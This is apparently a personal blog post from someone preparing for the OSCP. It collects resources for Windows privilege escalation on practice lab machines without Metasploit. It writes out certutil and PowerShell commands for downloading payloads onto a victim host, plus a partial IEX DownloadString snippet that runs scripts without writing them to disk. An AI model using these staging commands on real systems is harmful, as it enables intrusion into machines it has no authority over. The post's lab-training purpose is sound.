Windows priv esc tools. No Metasploit here.

Just a little compilation of a few of my favorite resources for non metasploit windows priv esc using precompiled .exe’s and priv checkers. The basics really.

Windows… Not my strongest area when it comes to priv escalation, let alone without relying on the lovely tool set of metasploit. So have devoted a good few evenings of prep to go through some HTB windows boxes. I won’t bother reiterating HTB write-ups here as there are plenty of high quality write up’s for old boxes. I have also been re-doing some I had previously completed minus any metasploit help. I have started to compile a pretty good list of things to dig me out of a hole when I get onto a windows box. Mainly these are resources other people have compiled so hats off to them. I don’t plan on reinventing the wheel, but being able to quickly find these references when you need them is great.

The cmd basics. Run through a very full list found here a quick fly through of some of these can often get you on the right path on some of the more CTF style boxes where things have been left for you. However as is often the case from what I have seen with windows it will boil down to some form of uncompiled exploit from a missing patch on the older machines(see the above link for a nice one liner to check current hotfixes). First challenge however can be getting these payloads onto the box without metasploit’s help of auto pwning through the shell. I recommend looking into certutil or powershell commands for this. There are a tonne of other ways but these two are my go to as they are as near to wget as I can get. All you need is write access to a directory and off you go.

Certutil:

certutil.exe -urlcache -split -f http://{host}/file.txt localfilename.txt

Powershell:

Invoke-WebRequest -Uri $url -OutFile $output

Combine the above with the usual python SimpleHTTPServer and your away you have a way of getting things onto boxes. There are also variations for powershell to invoke the script directly from your server without ever having to save it to disk on the victim machine, this can be very useful. Ippsec covers this technique a few times in his video’s. It is also covered amoungst the payloads at PayloadsAllTheThings (powershell IEX (New-Object Net.WebClient).DownloadString… etc.)

For powershell based tools and reverse shells there is Nishang which is a great little tool set its been added to my OSCP tool kit. The powershell reverse shells are nice and the other modules can prove useful. I don’t know how many powershell / windows boxes I will encounter or even what ancient version they will be running but I’d rather be comfortable than caught off guard and have to play catch up.

Have a windows VM! Compiling windows exploits is sometimes just so much easier and more reliable when using a windows machine. I always keep an old win 7 and win10 VM sat around for testing and compiling code if necessary. Doesnt have to be licensed just a nice test box, snapshot it and wipe it after each session. Always check for a precompiled exploit first! It might save you a bit of time. This git https://github.com/abatchy17/WindowsExploits is awesome, theres a few other iffy gits around, lots of precompiled ones don’t work or are nasty applications in themselves so use with caution.

And last but not least the best and most useful piece of the windows priv esc list Windows-Exploit-Suggester, its an amazing tool feed it a little sysinfo and it will provide you with some useful insights. There is also watson which is very similar however I started of with windows exploit suggester and have stuck with it really.

Only other piece of advice, to myself if no one else. Brush up on the basic cmds for windows. I spend a huge amount of time in the linux terminal but minimal time in the cmd window. Particularly for when powershell fails to run properly back through a shaky reverse shell.

Hope these links prove useful! I will publish a full resource list once / if I complete the OSCP with all the links to the git’s and pieces I used.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google photo

You are commenting using your Google account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s